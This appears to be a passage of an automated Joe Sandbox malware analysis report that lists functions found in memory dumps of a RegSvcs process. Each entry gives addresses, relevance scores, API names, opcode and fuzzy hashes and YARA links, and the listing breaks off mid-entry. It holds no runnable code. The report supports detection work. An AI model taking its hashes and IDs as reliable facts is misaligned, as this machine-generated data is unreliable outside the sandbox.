                                              • Instruction Fuzzy Hash: 0A2124B1C006599FCB10DF9AC844BDEFBF9EF48320F14816AD814A7651D378A944CFA5
                                              Function 069AEA40 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1386 69aea40-69aeab4 GlobalMemoryStatusEx 1388 69aeabd-69aeae5 1386->1388 1389 69aeab6-69aeabc 1386->1389 1389->1388
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 069AEAA7
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1788465510.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_69a0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 8cbb09d6e62c47b08449f23c77868e6cd73f7c95945119508ec20a254c0342bb
                                              • Instruction ID: 8ab4ffaeb59f8206acbdd8b725bdd1fb82c7c349ae46adde9acb14ef68f8012f
                                              • Opcode Fuzzy Hash: 8cbb09d6e62c47b08449f23c77868e6cd73f7c95945119508ec20a254c0342bb
                                              • Instruction Fuzzy Hash: 4711EFB1C006699BCB10DF9AD544BDEFBF5FB48324F14816AD818A7250D378A944CFA5
                                              Function 01313E74 Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj
                                              • API String ID: 0-3020623371
                                              • Opcode ID: b720fca1ca76efc672025c3d743bcb3ac3932fc25b75d1df0eeb563141c9ab97
                                              • Instruction ID: bc1afd4d9c5382a26d91189af004fa6307d811b992badb5b09d2ea5643816488
                                              • Opcode Fuzzy Hash: b720fca1ca76efc672025c3d743bcb3ac3932fc25b75d1df0eeb563141c9ab97
                                              • Instruction Fuzzy Hash: C0A16B71E00209DFDB18CFA9D9857DEFBF2BF88318F148129E815A7258EB749845CB91
                                              Function 01317B9D Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: c8be63c2ce85919d6ac41ee73d8d303a18be5d78227943cf8627f597168f495b
                                              • Instruction ID: 6f7639040f602ca031662b318f024b0fc456a4fa9905c32f015d71c18f343ace
                                              • Opcode Fuzzy Hash: c8be63c2ce85919d6ac41ee73d8d303a18be5d78227943cf8627f597168f495b
                                              • Instruction Fuzzy Hash: 9D31AF31E102499FDB2ACF79C9417AEB7B2EF85304F64852AE805EB299DB709C45CB50
                                              Function 01317C84 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: 04f311f6ecd2b38f4854c4b430a2cd7750a828beced18a72f19b9c9ddd394e4e
                                              • Instruction ID: bf8ca53e0534aa2aaa4c6caf12ac22b8101d10ecf5812fb61ac0897f341cebb6
                                              • Opcode Fuzzy Hash: 04f311f6ecd2b38f4854c4b430a2cd7750a828beced18a72f19b9c9ddd394e4e
                                              • Instruction Fuzzy Hash: 6931A131E102499FDB2ACF79C8417AEB7B2EF89304F64852AE805EB395DB749C45CB50
                                              Function 01316ECF Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: 6fa14c8e757c1403184b483a2e78816e3218d2157e86224648a4467665827795
                                              • Instruction ID: ee81cf920f25329f5b59c460bd307bce5469d4d33ac7b92302cec8ac5006675c
                                              • Opcode Fuzzy Hash: 6fa14c8e757c1403184b483a2e78816e3218d2157e86224648a4467665827795
                                              • Instruction Fuzzy Hash: 01618E347002158FCB18DB68C598AAE7BF6EF8D704F2444A9E406EB3A9DB75DC41CB91
                                              Function 01317D90 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: ce9014cb01392a3c979467ff2557771f99844b9ff40572e6e2890bb911d1c9d3
                                              • Instruction ID: 3c44d39bed89afd38a3fc2a01b3c1dcc9c9a11d3a857a2e26b336189e4721d9a
                                              • Opcode Fuzzy Hash: ce9014cb01392a3c979467ff2557771f99844b9ff40572e6e2890bb911d1c9d3
                                              • Instruction Fuzzy Hash: 3D317031E10209DFDB29DF69C4407AEB7B6FF89304F64852AE505EB284DB74AD45CB50
                                              Function 01316B98 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: f360a104de6b72cb60eb28d618edfc7beca9e9ff1fb47e5992315a16aa09724e
                                              • Instruction ID: a4d53f7a011b6b606c98fef4cee732e5f20ea67137352827304a736713427bd1
                                              • Opcode Fuzzy Hash: f360a104de6b72cb60eb28d618edfc7beca9e9ff1fb47e5992315a16aa09724e
                                              • Instruction Fuzzy Hash: 7E0100317041049FD715EB7894153AFBBE2EB8A300F20887AD01AC7394EA3598418B82
                                              Function 01318720 Relevance: .6, Instructions: 556COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dfb18d8da38c435ec8ac75620e028a237721ce02fbfaffa1dea22a81d1d904f5
                                              • Instruction ID: 6404cc1b89befb22673048df30ae631e1ccc976873d554aa5320f5c5304342ea
                                              • Opcode Fuzzy Hash: dfb18d8da38c435ec8ac75620e028a237721ce02fbfaffa1dea22a81d1d904f5
                                              • Instruction Fuzzy Hash: 24125E30741206AFCF1AEB6DE44426D73A2FB89315B504E3AD006CB759CF31EC8A9B95
                                              Function 0131A186 Relevance: .4, Instructions: 420COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7de676d14e29d9190c91c38b0858a08ee12ceaa7ab5c5e7c75dc5f4adcefa319
                                              • Instruction ID: 75136c27da3a9c734992ef1b25eeb388d03bbaf6f5f1faaaf7b504baeccadebf
                                              • Opcode Fuzzy Hash: 7de676d14e29d9190c91c38b0858a08ee12ceaa7ab5c5e7c75dc5f4adcefa319
                                              • Instruction Fuzzy Hash: 9BE1C334B011459FDB19DB6CD594AAEBBB2FF88315F108425E50AD7399DB30DC46CB50
                                              Function 01314A8D Relevance: .3, Instructions: 262COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b1ebf5053b73282f30c0467f5236c932d75866eff7c81cda68c229b147aee04
                                              • Instruction ID: ee2535448307cbde965f25f8aaff6c6df39d20de7679912c536c3506fa146cb6
                                              • Opcode Fuzzy Hash: 3b1ebf5053b73282f30c0467f5236c932d75866eff7c81cda68c229b147aee04
                                              • Instruction Fuzzy Hash: 31B15B70E00209DFDF18CFA9D98179DBBF1BF48318F248529D855EB298EB749885CB81
                                              Function 0131A6C8 Relevance: .1, Instructions: 137COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7c93647f0c4ef1d6eae1b0fedd302e1bd3767a92bb00c115bf97e4f05ee6772
                                              • Instruction ID: d9cce2e97f809d9b28f0297f32ea7d714de17c8e21592550ad3dc5e74b3c9d76
                                              • Opcode Fuzzy Hash: c7c93647f0c4ef1d6eae1b0fedd302e1bd3767a92bb00c115bf97e4f05ee6772
                                              • Instruction Fuzzy Hash: 89515C71A01205DFDB04DFA9E884799FBB2FF88315F14C269E9089B39AE770D945CB90
                                              Function 01316CD4 Relevance: .1, Instructions: 136COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fdc5a1bca5cb023d6d5e0b47a79fc28709bae13e69fc2c4286c34bb2d4a99cea
                                              • Instruction ID: f65241537474d954ac9d452ade6c04ba4db79440b4e0a2855df6d35f3ecf39d9
                                              • Opcode Fuzzy Hash: fdc5a1bca5cb023d6d5e0b47a79fc28709bae13e69fc2c4286c34bb2d4a99cea
                                              • Instruction Fuzzy Hash: 405105B0D102188FDB18CFA9C985B9DBBF1FF48314F148529D819AB359D7B4A884CF95
                                              Function 01316CE0 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 357a56e76efff1797a70ae863ce6e489e2d95917526fd84185f936f3155fde9f
                                              • Instruction ID: 141bfd64a776c84cfb77ecf614ee92f040f86f1d341b6f60ab4db8a0d306c910
                                              • Opcode Fuzzy Hash: 357a56e76efff1797a70ae863ce6e489e2d95917526fd84185f936f3155fde9f
                                              • Instruction Fuzzy Hash: 185104B0D102188FDB18CFA9C985B9DBBF5FF48314F148119E819AB369D7B4A884CF95
                                              Function 013117C0 Relevance: .1, Instructions: 125COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f39151096b3fa153b8636b7e2524f222693ca4d2adddf8b69e1c66604d022392
                                              • Instruction ID: cf6223c9d7c8b227680558aab020feed91b3599318f52a251ef58cd9e2f95b28
                                              • Opcode Fuzzy Hash: f39151096b3fa153b8636b7e2524f222693ca4d2adddf8b69e1c66604d022392
                                              • Instruction Fuzzy Hash: 0C41D031B0021A8FDF68EB79D5487EE3BF6AB48204F100829D605E7358EB358C41CB91
                                              Function 01311128 Relevance: .1, Instructions: 118COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 26b8cacf17048c23aa1287646ae3d37bc67a7b307334006d2605b753571a0785
                                              • Instruction ID: 0798bd0c181188fadafcd01feafad347521a4793a4c93fb9a2d471c6d63c6d43
                                              • Opcode Fuzzy Hash: 26b8cacf17048c23aa1287646ae3d37bc67a7b307334006d2605b753571a0785
                                              • Instruction Fuzzy Hash: 8451ED352522ABAFCF15FB2AF984A597B71F79A3047045B67D1044B33DDA207949CB80
                                              Function 01311138 Relevance: .1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f645c3933cdc0e38762a90fad0862a36fe644fd78a325ef2cd37c5ea308f94fe
                                              • Instruction ID: 1e87182e4477572fa6612a455fd2e38efe4fa24953c1c1ffe688b5d5129d6ca0
                                              • Opcode Fuzzy Hash: f645c3933cdc0e38762a90fad0862a36fe644fd78a325ef2cd37c5ea308f94fe
                                              • Instruction Fuzzy Hash: 0D51CC342522ABAFCF15FB2AF984A597B65F79A3043045B6BD1044B33DDB707949CB80
                                              Function 0131DE6A Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac4ba62b99f2b03d458cad910093bb4a4b504ea130412ea83afd8cdf742a3ac0
                                              • Instruction ID: 4547188ee47477c7530571ad041d557b2857e33630904da89b80659cbcd1b34e
                                              • Opcode Fuzzy Hash: ac4ba62b99f2b03d458cad910093bb4a4b504ea130412ea83afd8cdf742a3ac0
                                              • Instruction Fuzzy Hash: 17316E75B00616EFD705DB68C990E3AB76ABFC4304F14C168E4059B2A9CB32EC82CB90
                                              Function 013126DC Relevance: .1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d208fdb6a2bb338409f8a9c4dc7451acadf1edf9c7689fcd4e474f8f86d93feb
                                              • Instruction ID: c1557e51f2a95b194d168e89310930560299c27a8f73edab50c107f740934c2c
                                              • Opcode Fuzzy Hash: d208fdb6a2bb338409f8a9c4dc7451acadf1edf9c7689fcd4e474f8f86d93feb
                                              • Instruction Fuzzy Hash: B441E0B0D00249DFDB14DFA9C484ADEBFB5FF48314F248429E809AB254DB75A949CB90
                                              Function 01315097 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d307b9a1cdc5fc8d6c736bbe67a2a31f70696f1e24efdfbf6fe6e5243ee58053
                                              • Instruction ID: 9043cbe9f9ac0014d75fa2b1eac1cd51fa957310e8e0c2330bdee9aa09fd069b
                                              • Opcode Fuzzy Hash: d307b9a1cdc5fc8d6c736bbe67a2a31f70696f1e24efdfbf6fe6e5243ee58053
                                              • Instruction Fuzzy Hash: DC314D34B002599FDF1AEB78C5646ED77B6AF8D208F200579D901AB399DB369C01CB90
                                              Function 013126E8 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0b138bdac8ba8571e8859d1625bf99a3b02096a632e01ae88446f6bbb2e3e69
                                              • Instruction ID: 49851a55e90e7ecf82a06346741cd1b40c71b2faf993e4fe7607ff838140ee39
                                              • Opcode Fuzzy Hash: f0b138bdac8ba8571e8859d1625bf99a3b02096a632e01ae88446f6bbb2e3e69
                                              • Instruction Fuzzy Hash: 3D41E0B0D00349DFDB14DFA9C584A9EBFB5FF48314F248429E809AB254DB75A945CB90
                                              Function 013150A8 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96ee002c2ee3907deda4ba8a94fb9c7970f44289e87e6b994f3c81274d649d6e
                                              • Instruction ID: ade5f28f7f739a7e9313a391ea1a2effddbf6f81f919791c9620bc15aad4a4a2
                                              • Opcode Fuzzy Hash: 96ee002c2ee3907deda4ba8a94fb9c7970f44289e87e6b994f3c81274d649d6e
                                              • Instruction Fuzzy Hash: 70313A34B0021A9FDF19EB78C9646AD77B6AF8D208F100579D601AB398DF36DC41CB90
                                              Function 0131A068 Relevance: .1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a2e4a5ff8d54392896c89a6e72e9efca6fa4e86fea1769f270c1ddaae69bbb4
                                              • Instruction ID: 3c3ed06a881299173f4372eeb9063c0d3e34173db0205d75341e27f588cd37b3
                                              • Opcode Fuzzy Hash: 4a2e4a5ff8d54392896c89a6e72e9efca6fa4e86fea1769f270c1ddaae69bbb4
                                              • Instruction Fuzzy Hash: 8731B434E112499BCB19CFA8D94069EF7B6FF89304F10C62AE805EB349DB719845CB90
                                              Function 0131169F Relevance: .1, Instructions: 80COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ac50729dae76e658466cb7fdbc2683262d91a8b2750973c097fb2e419513800
                                              • Instruction ID: 14a6a52958d05062196c2746d49e2761a2cd9b2f6f890b62ee4563b62353802c
                                              • Opcode Fuzzy Hash: 1ac50729dae76e658466cb7fdbc2683262d91a8b2750973c097fb2e419513800
                                              • Instruction Fuzzy Hash: 5021D3386401114FDF26E73DE988B9A7766EB49318F044B63D206CB36EEB25DC85CB91
                                              Function 0131A078 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc8c8210ac0e491a023953ec46b1966238f0f3cf4f5005d0bbab481877701405
                                              • Instruction ID: 16662d1ee387c59f3bd45dce435b3b4afebf2824c08627bd0aec997ef8e753da
                                              • Opcode Fuzzy Hash: bc8c8210ac0e491a023953ec46b1966238f0f3cf4f5005d0bbab481877701405
                                              • Instruction Fuzzy Hash: FE218030E1124A9BDB19CFA8D95069EF7B6FF89304F10C62AE805AB349DB719845CB90
                                              Function 01319F68 Relevance: .1, Instructions: 77COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 328c02acb514998b675a1c572f38cf6c9b9c2979ba060979ec5e1b6ca73aaff5
                                              • Instruction ID: feb025646b22e224ed107e88341e9e65abd7f96a0f5a28ec3a4d495a9ecbb6d7
                                              • Opcode Fuzzy Hash: 328c02acb514998b675a1c572f38cf6c9b9c2979ba060979ec5e1b6ca73aaff5
                                              • Instruction Fuzzy Hash: A921A431E103099BCB19CF68C9556EEB7B6FF89314F50852AE806FB744EB70A845CB51
                                              Function 0131A852 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 636e5a43188cb55f2326acb7f7409eb11f2b0a3962744f727874fffd3d4a25c9
                                              • Instruction ID: ac0e77766d0b6c52db41a04ec5e8bb302beadb520f62237c9235873859209390
                                              • Opcode Fuzzy Hash: 636e5a43188cb55f2326acb7f7409eb11f2b0a3962744f727874fffd3d4a25c9
                                              • Instruction Fuzzy Hash: 41210671B101058FEB18CB7CC854BAE7BF6EF8C329F108165E505EB3A8DA718C408B90
                                              Function 01311382 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3667cced2e5ff45133dbdaf2232b677b4e86f8f1ad622cc7de29099c71e1bf4
                                              • Instruction ID: cf6b6f645282711d42c0161677ccb9898d718d5e67c97c8c46aa877bd208363b
                                              • Opcode Fuzzy Hash: c3667cced2e5ff45133dbdaf2232b677b4e86f8f1ad622cc7de29099c71e1bf4
                                              • Instruction Fuzzy Hash: B621A8706802114BDB3AA73DE8483ED7761E706319F540C6BD606D779DDA24C8C9C742
                                              Function 01311878 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cfac2faa0e1836b9464270ce4dc160bb2bf1f934e80ecc5f68fdfb659fbf5e1
                                              • Instruction ID: edee77124d2f5ee5cb2c5d38f8bf16b9abcc5c76379c8d969857c66e8a26f11c
                                              • Opcode Fuzzy Hash: 6cfac2faa0e1836b9464270ce4dc160bb2bf1f934e80ecc5f68fdfb659fbf5e1
                                              • Instruction Fuzzy Hash: E1217C30B002098FDF68EB78D5547ED7BF6AB49208F200469C605EB359DB369D01CBA1
                                              Function 01314F89 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57c91a665e99a3d2f02e39b40b0cd707aeb55f4452c15948912d215c612a2f34
                                              • Instruction ID: 809fe5685e6f592439825a228d2734c80644ae1ce382d76b9b54a3c98abe45b1
                                              • Opcode Fuzzy Hash: 57c91a665e99a3d2f02e39b40b0cd707aeb55f4452c15948912d215c612a2f34
                                              • Instruction Fuzzy Hash: C4212B34A00209CFDB58DF7CD558AAD7BF1AF8D308B104569E506EB369DB369D01CB94
                                              Function 01311888 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffc9df9d32c0a75919402ea143ea386d837f012955f7dbd0cc1b39823c50d5d7
                                              • Instruction ID: dab61cd12a2cf5379ce3bfb7dfa481c9326b6dad52cbeaba583eb82bc7ed5bb0
                                              • Opcode Fuzzy Hash: ffc9df9d32c0a75919402ea143ea386d837f012955f7dbd0cc1b39823c50d5d7
                                              • Instruction Fuzzy Hash: 1F212A30B002198FDF68EB78D5547EE7BF6AB49209F100469D616EB358EF369D40CBA1
                                              Function 01319F78 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3243cbde1c4bbdf027709b74b529ab3e5bfa3c46b6a47261194a9b498dde631b
                                              • Instruction ID: bd75762856e5177638213e3a8a6c4cbe168228dbe7f3af708b9e5692875cfa6d
                                              • Opcode Fuzzy Hash: 3243cbde1c4bbdf027709b74b529ab3e5bfa3c46b6a47261194a9b498dde631b
                                              • Instruction Fuzzy Hash: 49216230E103099BCB19CF68C554A9EF7B6BF89314F10852AE816FB755EB70A845CB50
                                              Function 013116B0 Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52ab36350fb374299dae44e0775227f8f894a1ecd0a992119aed46df9f6478bb
                                              • Instruction ID: 7eacf77bd1f6c42b4c73138058bae8d5ba60f0fc173f686db34e2fb5c6c665b7
                                              • Opcode Fuzzy Hash: 52ab36350fb374299dae44e0775227f8f894a1ecd0a992119aed46df9f6478bb
                                              • Instruction Fuzzy Hash: E62190386401114FDF26E73DF98879A7766E749318F104A23D106C736EEB25DC84CB91
                                              Function 01314F98 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.1779851891.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_1310000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
